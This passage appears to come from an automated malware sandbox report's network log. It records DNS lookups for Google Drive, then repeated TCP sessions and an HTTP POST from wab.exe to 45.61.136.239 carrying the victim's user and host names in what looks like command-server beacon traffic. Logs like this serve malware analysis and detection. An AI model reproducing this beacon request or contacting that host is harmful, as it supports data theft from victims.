                  Jul 3, 2024 09:42:37.323559999 CEST4971880192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:37.329711914 CEST804971845.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:37.329727888 CEST804971845.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:37.329742908 CEST804971845.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:37.329773903 CEST4971880192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:37.329801083 CEST4971880192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:37.473566055 CEST4971980192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:37.478516102 CEST804971945.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:37.478621006 CEST4971980192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:37.481024027 CEST4971980192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:37.486063957 CEST804971945.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:37.486402035 CEST4971980192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:37.491175890 CEST804971945.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:40.269757986 CEST804971945.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:40.269789934 CEST804971945.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:40.269805908 CEST804971945.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:40.269820929 CEST804971945.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:40.269838095 CEST804971945.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:40.269849062 CEST4971980192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:40.269875050 CEST804971945.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:40.269889116 CEST4971980192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:40.269893885 CEST804971945.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:40.269906998 CEST4971980192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:40.269912004 CEST804971945.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:40.269953012 CEST4971980192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:40.270004034 CEST804971945.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:40.270019054 CEST804971945.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:40.270052910 CEST4971980192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:40.274717093 CEST4971980192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:40.274775028 CEST804971945.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:40.274791002 CEST804971945.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:40.274805069 CEST804971945.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:40.274820089 CEST804971945.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:40.274828911 CEST4971980192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:40.274899006 CEST4971980192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:40.275636911 CEST4971980192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:40.465432882 CEST4972080192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:40.470474958 CEST804972045.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:40.470609903 CEST4972080192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:40.474009991 CEST4972080192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:40.478826046 CEST804972045.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:40.478893995 CEST4972080192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:40.483690977 CEST804972045.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:44.028515100 CEST804972045.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:44.028537989 CEST804972045.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:44.028554916 CEST804972045.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:44.028564930 CEST804972045.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:44.028578043 CEST804972045.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:44.028603077 CEST4972080192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:44.028640985 CEST804972045.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:44.028656006 CEST804972045.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:44.028667927 CEST804972045.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:44.028681993 CEST4972080192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:44.028706074 CEST4972080192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:44.028760910 CEST804972045.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:44.028819084 CEST804972045.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:44.028862000 CEST4972080192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:44.029005051 CEST4972080192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:44.033695936 CEST804972045.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:44.033714056 CEST804972045.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:44.033726931 CEST804972045.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:44.033762932 CEST4972080192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:44.033785105 CEST4972080192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:44.034727097 CEST4972080192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:44.166394949 CEST4972180192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:44.171446085 CEST804972145.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:44.171549082 CEST4972180192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:44.173589945 CEST4972180192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:44.178508043 CEST804972145.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:44.178575993 CEST4972180192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:44.183451891 CEST804972145.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:48.494966030 CEST804972145.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:48.495048046 CEST804972145.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:48.495089054 CEST804972145.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:48.495121956 CEST4972180192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:48.495138884 CEST804972145.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:48.495176077 CEST804972145.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:48.495208979 CEST804972145.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:48.495242119 CEST804972145.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:48.495282888 CEST4972180192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:48.495284081 CEST4972180192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:48.495290995 CEST804972145.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:48.495327950 CEST804972145.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:48.495338917 CEST4972180192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:48.495357037 CEST804972145.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:48.495399952 CEST4972180192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:48.495565891 CEST4972180192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:48.500415087 CEST804972145.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:48.500452042 CEST804972145.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:48.500492096 CEST4972180192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:48.500504017 CEST4972180192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:48.500504017 CEST804972145.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:48.500538111 CEST804972145.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:48.500547886 CEST4972180192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:48.500586033 CEST4972180192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:48.633877993 CEST4972280192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:48.638750076 CEST804972245.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:48.638840914 CEST4972280192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:48.641217947 CEST4972280192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:48.646071911 CEST804972245.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:48.646121979 CEST4972280192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:48.650914907 CEST804972245.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:52.335706949 CEST804972245.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:52.335731030 CEST804972245.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:52.335742950 CEST804972245.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:52.335755110 CEST804972245.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:52.335766077 CEST804972245.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:52.335777998 CEST804972245.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:52.335796118 CEST804972245.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:52.335828066 CEST804972245.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:52.335836887 CEST804972245.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:52.335846901 CEST804972245.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:52.336034060 CEST4972280192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:52.336034060 CEST4972280192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:52.336239100 CEST4972280192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:52.340941906 CEST804972245.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:52.340964079 CEST804972245.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:52.340975046 CEST804972245.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:52.340985060 CEST804972245.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:52.340996027 CEST804972245.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:52.341006041 CEST4972280192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:52.341037035 CEST4972280192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:52.341059923 CEST4972280192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:52.484766006 CEST4972380192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:52.489851952 CEST804972345.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:52.489950895 CEST4972380192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:52.492042065 CEST4972380192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:52.496901989 CEST804972345.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:52.496962070 CEST4972380192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:52.501943111 CEST804972345.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:56.404045105 CEST804972345.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:56.404077053 CEST804972345.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:56.404097080 CEST804972345.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:56.404113054 CEST804972345.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:56.404128075 CEST804972345.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:56.404145002 CEST804972345.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:56.404155970 CEST4972380192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:56.404175043 CEST804972345.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:56.404196978 CEST4972380192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:56.404227018 CEST4972380192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:56.404236078 CEST804972345.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:56.404251099 CEST804972345.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:56.404258966 CEST804972345.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:56.404294014 CEST4972380192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:56.404475927 CEST4972380192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:56.409162045 CEST804972345.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:56.409184933 CEST804972345.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:56.409202099 CEST804972345.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:56.409216881 CEST804972345.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:56.409229994 CEST4972380192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:56.409266949 CEST4972380192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:56.409404039 CEST804972345.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:56.409451008 CEST4972380192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:56.540894985 CEST4972480192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:56.546008110 CEST804972445.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:56.546097994 CEST4972480192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:56.548578978 CEST4972480192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:56.553423882 CEST804972445.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:56.553491116 CEST4972480192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:56.558409929 CEST804972445.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:59.589202881 CEST804972445.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:59.589224100 CEST804972445.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:59.589231968 CEST804972445.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:59.589241028 CEST804972445.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:59.589248896 CEST804972445.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:59.589255095 CEST804972445.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:59.589364052 CEST4972480192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:59.589410067 CEST4972480192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:59.589466095 CEST804972445.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:59.589477062 CEST804972445.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:59.589488029 CEST804972445.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:59.589524031 CEST4972480192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:59.589682102 CEST4972480192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:59.589689016 CEST804972445.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:59.589739084 CEST4972480192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:59.594367027 CEST804972445.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:59.594384909 CEST804972445.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:59.594394922 CEST804972445.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:59.594405890 CEST804972445.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:59.594443083 CEST4972480192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:59.594476938 CEST4972480192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:59.728292942 CEST4972580192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:59.733156919 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:59.733262062 CEST4972580192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:59.735537052 CEST4972580192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:59.740433931 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:42:59.740516901 CEST4972580192.168.2.745.61.136.239
                  Jul 3, 2024 09:42:59.745824099 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.749432087 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.749464035 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.749480963 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.749495983 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.749512911 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.749526024 CEST4972580192.168.2.745.61.136.239
                  Jul 3, 2024 09:43:03.749579906 CEST4972580192.168.2.745.61.136.239
                  Jul 3, 2024 09:43:03.749803066 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.749819040 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.749855995 CEST4972580192.168.2.745.61.136.239
                  Jul 3, 2024 09:43:03.749996901 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.750010967 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.750026941 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.750056982 CEST4972580192.168.2.745.61.136.239
                  Jul 3, 2024 09:43:03.750082970 CEST4972580192.168.2.745.61.136.239
                  Jul 3, 2024 09:43:03.754659891 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.754682064 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.754698992 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.754714966 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.754735947 CEST4972580192.168.2.745.61.136.239
                  Jul 3, 2024 09:43:03.754761934 CEST4972580192.168.2.745.61.136.239
                  Jul 3, 2024 09:43:03.836761951 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.836786032 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.836802006 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.836818933 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.836834908 CEST4972580192.168.2.745.61.136.239
                  Jul 3, 2024 09:43:03.836857080 CEST4972580192.168.2.745.61.136.239
                  Jul 3, 2024 09:43:03.836963892 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.836981058 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.836997032 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.837017059 CEST4972580192.168.2.745.61.136.239
                  Jul 3, 2024 09:43:03.837485075 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.837498903 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.837515116 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.837538004 CEST4972580192.168.2.745.61.136.239
                  Jul 3, 2024 09:43:03.837572098 CEST4972580192.168.2.745.61.136.239
                  Jul 3, 2024 09:43:03.837774992 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.837790966 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.837805986 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.837822914 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.837837934 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.837841034 CEST4972580192.168.2.745.61.136.239
                  Jul 3, 2024 09:43:03.837862015 CEST4972580192.168.2.745.61.136.239
                  Jul 3, 2024 09:43:03.838531971 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.838556051 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.838571072 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.838586092 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.838587046 CEST4972580192.168.2.745.61.136.239
                  Jul 3, 2024 09:43:03.838603020 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.838618994 CEST4972580192.168.2.745.61.136.239
                  Jul 3, 2024 09:43:03.838649988 CEST4972580192.168.2.745.61.136.239
                  Jul 3, 2024 09:43:03.840467930 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.840501070 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.840517044 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.840533018 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.840545893 CEST4972580192.168.2.745.61.136.239
                  Jul 3, 2024 09:43:03.840575933 CEST4972580192.168.2.745.61.136.239
                  Jul 3, 2024 09:43:03.841866016 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.842010975 CEST804972545.61.136.239192.168.2.7
                  Jul 3, 2024 09:43:03.842057943 CEST4972580192.168.2.745.61.136.239

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jul 3, 2024 09:41:34.066015005 CEST5365453192.168.2.71.1.1.1
                  Jul 3, 2024 09:41:34.073801994 CEST53536541.1.1.1192.168.2.7
                  Jul 3, 2024 09:41:35.141273022 CEST5278453192.168.2.71.1.1.1
                  Jul 3, 2024 09:41:35.148945093 CEST53527841.1.1.1192.168.2.7

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Jul 3, 2024 09:41:34.066015005 CEST192.168.2.71.1.1.10x5194Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                  Jul 3, 2024 09:41:35.141273022 CEST192.168.2.71.1.1.10x3d7eStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Jul 3, 2024 09:41:34.073801994 CEST1.1.1.1192.168.2.70x5194No error (0)drive.google.com142.250.186.110A (IP address)IN (0x0001)false
                  Jul 3, 2024 09:41:35.148945093 CEST1.1.1.1192.168.2.70x3d7eNo error (0)drive.usercontent.google.com142.250.185.193A (IP address)IN (0x0001)false

                  HTTP Request Dependency Graph

                  • drive.google.com
                  • drive.usercontent.google.com
                  • 45.61.136.239

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.74970845.61.136.239807572C:\Program Files (x86)\Windows Mail\wab.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 09:41:37.959573030 CEST250OUTPOST /index.php/54596186971079 HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.61.136.239
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: FC0E2304
                  Content-Length: 192
                  Connection: close
                  Jul 3, 2024 09:41:37.964585066 CEST192OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                  Data Ascii: 'ckav.rufrontdesk849224FRONTDESK-PC0FDD42EE188E931437F4FBE2CezPo1
                  Jul 3, 2024 09:41:43.862720966 CEST1236INHTTP/1.0 404 Not Found
                  Date: Wed, 03 Jul 2024 07:41:38 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found &#8211; Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship &raquo; Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/*! This
                  Jul 3, 2024 09:41:43.862731934 CEST1236INData Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f
                  Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
                  Jul 3, 2024 09:41:43.862737894 CEST1236INData Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74
                  Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
                  Jul 3, 2024 09:41:43.862766027 CEST1236INData Raw: 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72
                  Data Ascii: orts.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).th
                  Jul 3, 2024 09:41:43.862776041 CEST896INData Raw: 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f 2c 6d 6f 6e 6f 73 70 61 63 65
                  Data Ascii: order:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:#ffffffa6}.wp-block-embe
                  Jul 3, 2024 09:41:43.863229036 CEST1236INData Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e
                  Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
